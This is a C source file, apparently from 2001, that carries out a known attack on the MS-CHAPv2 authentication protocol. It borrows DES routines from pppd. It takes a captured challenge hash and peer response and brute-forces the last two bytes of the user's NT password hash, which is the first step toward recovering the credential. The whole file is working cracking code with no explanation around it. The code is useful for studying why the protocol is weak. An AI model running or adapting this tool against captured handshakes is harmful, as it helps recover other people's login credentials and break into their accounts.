/* an example of a chapms-v2 attack */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <crypt.h>

/*  taken from ppp/pppd/extra_crypto.c 
 *  Copyright (c) Tim Hockin, Cobalt Networks Inc. and others 
 */
unsigned char Get7Bits(unsigned char *input, int startBit)
{
	register unsigned int word;

	word = (unsigned) input[startBit / 8] << 8;
	word |= (unsigned) input[startBit / 8 + 1];

	word >>= 15 - (startBit % 8 + 7);

	return word & 0xFE;
}


static void MakeKey(unsigned char *key, unsigned char *des_key)
{
	des_key[0] = Get7Bits(key, 0);
	des_key[1] = Get7Bits(key, 7);
	des_key[2] = Get7Bits(key, 14);
	des_key[3] = Get7Bits(key, 21);
	des_key[4] = Get7Bits(key, 28);
	des_key[5] = Get7Bits(key, 35);
	des_key[6] = Get7Bits(key, 42);
	des_key[7] = Get7Bits(key, 49);

}


/* in == 8-byte string (expanded version of the 56-bit key)
 * out == 64-byte string where each byte is either 1 or 0
 * Note that the low-order "bit" is always ignored by by setkey()
 */
void Expand(unsigned char *in, unsigned char *out)
{
	int j, c;
	int i;

	for (i = 0; i < 64; in++) {
		c = *in;
		for (j = 7; j >= 0; j--)
			*out++ = (c >> j) & 1;
		i += 8;
	}
}

/* The inverse of Expand
 */
void Collapse(unsigned char *in, unsigned char *out)
{
	int j;
	int i;
	unsigned int c;

	for (i = 0; i < 64; i += 8, out++) {
		c = 0;
		for (j = 7; j >= 0; j--, in++)
			c |= *in << j;
		*out = c & 0xff;
	}
}

void
DesEncrypt(unsigned char *clear, unsigned char *key, unsigned char *cipher)
{
	unsigned char des_key[8];
	unsigned char crypt_key[66];
	unsigned char des_input[66];

	MakeKey(key, des_key);

	Expand(des_key, crypt_key);
	setkey(crypt_key);

	Expand(clear, des_input);
	encrypt(des_input, 0);
	Collapse(des_input, cipher);
}


/* written from scratch
 * Copyright (C) 2001 Jochen Eisinger, University of Freiburg
 */

#define hex2int(c)	((((c) >= '0') && ((c) <= '9')) ? ((c) - '0') : \
			((((c) >= 'A') && ((c) <= 'F')) ? ((c) - 'A' + 10) : \
			((c) - 'a' + 10)))

/* GetCharArray:
 * 	Convert ASCII String to binary
 */
void GetCharArray(char *s, unsigned char *a)
{

	int i, w;

	for (i = 0; i < strlen(s); i += 2) {

		w = hex2int(s[i]);
		w <<= 4;
		w += hex2int(s[i + 1]);

		a[i >> 1] = w;

	}

}

/* PutCharArray:
 * 	Convert binary to ASCII String
 */
char hexcode[] = "0123456789abcdef";
void PutCharArray(unsigned char *a, int c)
{
	int i;
	for (i = 0; i < c; i++)
		printf("%c%c", hexcode[a[i] >> 4], hexcode[a[i] & 15]);
}


/* the SHA1 hash of the challenge, peer_challenge & username */
unsigned char challengehash[8];

/* the response send by the peer */
unsigned char response[24];

/* the zero padded (thank you m$ for making this possible) password hash */
unsigned char zpwhash[7] = { 0, 0, 0, 0, 0, 0, 0 };

/* the DES cipher */
unsigned char cipher[8];

void brute_force()
{
	int i;

	for (i = 0; i <= 0xffff; i++) {
		zpwhash[0] = i >> 8;
		zpwhash[1] = i & 0xff;


		DesEncrypt(challengehash, zpwhash, cipher);
		if (memcmp(cipher, response + 16, 8) == 0) {
			PutCharArray(zpwhash, 2);
			return;
		}
	}

}




int main(int argc, char **argv)
{


	puts("Copyright (C) 2001 Jochen Eisinger, University of Freiburg");

	/* do at least some sanity check... */
	if (argc != 3) {

		printf("\nusage: %s hash" " response\n", argv[0]);
		return -1;

	}

	GetCharArray(argv[1], challengehash);
	GetCharArray(argv[2], response);

	brute_force();

	puts("");

	return 0;
}
